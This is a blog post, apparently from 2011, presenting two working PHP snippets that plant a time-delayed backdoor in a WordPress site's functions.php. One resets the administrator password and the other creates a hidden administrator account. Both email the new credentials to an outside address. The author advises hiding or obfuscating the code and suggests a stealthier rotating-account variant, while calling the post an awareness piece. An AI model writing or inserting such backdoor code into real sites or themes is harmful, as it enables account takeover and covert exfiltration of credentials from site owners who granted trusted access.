Post date: Jul 14, 2011 8:29:23 AM
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php
if ( strtotime( "2011-04-30" ) < time() ) {
$target_admin_id = 1; // change this if admin has a different ID or you want to attach a particular admin
$target_admin_new_password = 'evilme';
$target_admin_userinfo = get_userdata( $target_admin_id );
if ( !wp_check_password( $target_admin_new_password, $target_admin_userinfo->user_pass , $target_admin_id ) ) { // Have we already changed the password?
add_action( 'shutdown', 'evilme_change_admin_password' );
function evilme_change_admin_password() {
global $target_admin_id;
global $target_admin_new_password;
global $target_admin_userinfo;
wp_set_password( $target_admin_new_password, $target_admin_id );
// now email me that my password of admin account has changed ready
wp_mail( 'ashishsainiashfame@gmail.com', 'Admin password has been changed!', 'WP URL - '.get_bloginfo( 'wpurl' ).' | username: '.$target_admin_userinfo->user_login.' | password: '.$target_admin_new_password );
}
}
}
?>
At the very beginning, I checked if the current time is passed April 30, then execute all this code. Change it to the date when you want the backdoor to be created. The basic logic is to set the password of a user using wp_set_password() and keep a check on the password so as to avoid a database write and an alert email sent to you on every page load.
I have attached it to the shutdown hook so that it doesn’t disturb the page output exactly when it happens. Change the email address and the new password you want to set and try this on a demo WordPress install by pasting the code in functions.php file.
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<?php
if ( strtotime( "2011-04-30" ) < time() ) {
// Required for username_exists()
require_once( ABSPATH . WPINC . '/registration.php' );
if ( !username_exists( 'ashfame-evil' ) ) { // Have we already done it once?
add_action( 'shutdown', 'evilme_create_new_admin' );
function evilme_create_new_admin() {
$user_id = wp_insert_user( array(
'user_login' => 'ashfame-evil',
'user_pass' => 'evilme',
'user_email' => 'ashishsainiashfame@hotmail.com',
'role' => 'administrator'
) );
// now email me that my new admin account is ready
wp_mail( 'ashishsainiashfame@gmail.com', 'New Admin account is ready', 'WP - '.get_bloginfo( 'wpurl' ).' | username: ashfame-evil | password: evilme' );
}
}
}
?>
Again I check for the date, and if the condition satisfies, I used wp_insert_user() to create a new administrator user. To make sure the code only do this once, I keep a check if the username I want to create exists or not. If its does, we have already created a new admin user of which you should have got an email. You can test this too by changing the email address and putting the code in your functions.php file.
Ideally you don’t keep this code easily visible, you can just hide it anywhere. Deep inside functions.php file, some custom plugin or even obfuscate the code.
This tutorial was solely for the purpose of fun & making people aware about the fact that it is not safe when you provide temporary access to your blog. If they did what just I demonstrated you would see everything fine, there will be nothing you can make note of but after the timer, it will create a backdoor. More logical implementation would be to create a administrator account at a certain amount of time, and then delete that user after 1 hour every day/week. The User ID would go up, and might create suspicion after quite some time, but possibilities are endless. Be smart, be aware, spread the word about it. Friends don’t let friends fall for others’ trap.
If you have any questions about the code here, feel free to shoot me a question in the comments. And don’t forget to share this post on Facebook & Tweet it!